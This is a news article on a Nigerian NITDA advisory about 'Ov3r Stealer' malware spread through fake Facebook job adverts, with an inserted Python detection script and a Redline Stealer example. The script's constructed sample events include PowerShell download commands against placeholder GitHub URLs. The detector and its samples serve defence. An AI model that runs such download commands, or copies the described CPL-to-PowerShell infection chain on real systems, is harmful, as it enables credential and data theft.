The National Information Technology Development Agency (NITDA)’s Computer Emergency Readiness and Response Team (CERRT) has alerted Nigerians to a new malware attack identified as ‘Ov3r Stealer’ targeting Facebook users.
The Agency, in an advisory released on Monday, said the new threat deceives Facebook users into clicking on malicious links under the guise of job advertisements. It then gains access to the users’ sensitive information and extracts their data for attacks.
What NITDA is saying
- In the threat alert released on Monday, the Agency in charge of technology regulation in Nigeria stated:
- “A new threat, known as ‘Ov3r Stealer’ malware, has emerged, targeting users on Facebook, spreading through deceptive job advertisements and fake accounts.
- “Users become infected by clicking on these malicious advertisement links. The malware employs various execution methods to extract sensitive data from victims.
- “The Ov3r_Stealer malware can also be used as a dropper for other malware, including ransomware.”
The Impacts
NITDA added that when users click on the advertisement, they are redirected to a malicious Discord URL, which executes the malware through a PowerShell script masquerading as a Windows Control Panel (CPL) file. The script downloads the malware payload from a GitHub repository.
- “Ov3r_Stealer poses a significant risk by silently exfiltrating a wide range of personal and sensitive information including geolocation (based on IP), hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Office documents, and antivirus product information.
- “This data is subsequently transmitted to a Telegram channel where it is possibly sold or used for phishing attacks,” NITDA added.
To guard against attacks, NITDA advised Nigerians to ensure that their apps are always updated. It added that Facebook users should also be wary of clicking on advertisement links, especially on social media platforms.
The Agency also urged Nigerians to ensure that their systems’ antivirus software is updated regularly and that they stay updated on new and evolving threats.
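The execution chain the advisory describes (a file posing as a CPL that launches PowerShell, which then fetches a payload from GitHub) leaves a recognisable parent/child pattern in process-creation logs. The detection logic below is an added example, not part of NITDA's advisory; the Sysmon-style field names, the loader and host lists, and the sample events are assumptions constructed for illustration.

```python
import re

# Assumptions, not from the advisory: events use Sysmon Event ID 1 field names,
# and the loader/host lists are illustrative. All sample events are constructed.
CPL_LOADERS = {"control.exe", "rundll32.exe"}   # Windows binaries that open .cpl files
POWERSHELL = {"powershell.exe", "pwsh.exe"}
GITHUB_HOSTS = ("github.com", "raw.githubusercontent.com")
URL_RE = re.compile(r"https?://([^/\s'\"]+)", re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_github(host):
    # Exact or subdomain match, so github.com.lookalike.test does not count.
    host = host.lower().split(":")[0]
    return any(host == g or host.endswith("." + g) for g in GITHUB_HOSTS)

def reasons(ev):
    """Which parts of the described chain a process-creation event shows."""
    found = []
    if basename(ev.get("Image", "")) not in POWERSHELL:
        return found
    if (basename(ev.get("ParentImage", "")) in CPL_LOADERS
            and ".cpl" in ev.get("ParentCommandLine", "").lower()):
        found.append("powershell spawned by a .cpl loader")
    if any(is_github(h) for h in URL_RE.findall(ev.get("CommandLine", ""))):
        found.append("command line references a GitHub host")
    return found

def detect(events):
    return [ev["ProcessId"] for ev in events if len(reasons(ev)) == 2]

SAMPLE_EVENTS = [  # constructed
    {"ProcessId": 101, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c iwr https://raw.githubusercontent.com/example/placeholder/file",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "ParentCommandLine": r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\u\Downloads\job.cpl"},
    {"ProcessId": 102, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -c iwr https://github.com/example/tool/releases",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe"},
    {"ProcessId": 103, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c iwr https://github.com.lookalike.test/x",
     "ParentImage": r"C:\Windows\System32\control.exe",
     "ParentCommandLine": r"control.exe C:\Users\u\Downloads\job.cpl"},
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Events that show only one half of the chain, such as 102 and 103, are left for triage through `reasons()` rather than raised as alerts.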
What you should know
With social media becoming part of the daily lives of individuals and businesses, cybercriminals are now focusing more on using different social media platforms to attack and defraud users.
The most common way that malware infection occurs is by opening an attachment or clicking a link in a malicious email, which many people are familiar with – but what is not always considered is how easy it could be to click on an unsafe link in a social media platform, potentially granting access to devices and accounts on your network.
In 2022, Avast researchers discovered that a password stealer called Redline Stealer was being spread through hacked Facebook business pages in Brazil, Slovakia, and the Philippines.
The ISP Viu Internet from Brazil, which had 15,000 Facebook followers, had posts offering free downloads of tools, apps, wallpaper, and games that appeared on their page. By clicking to download, the user would instead get infected with Redline Stealer.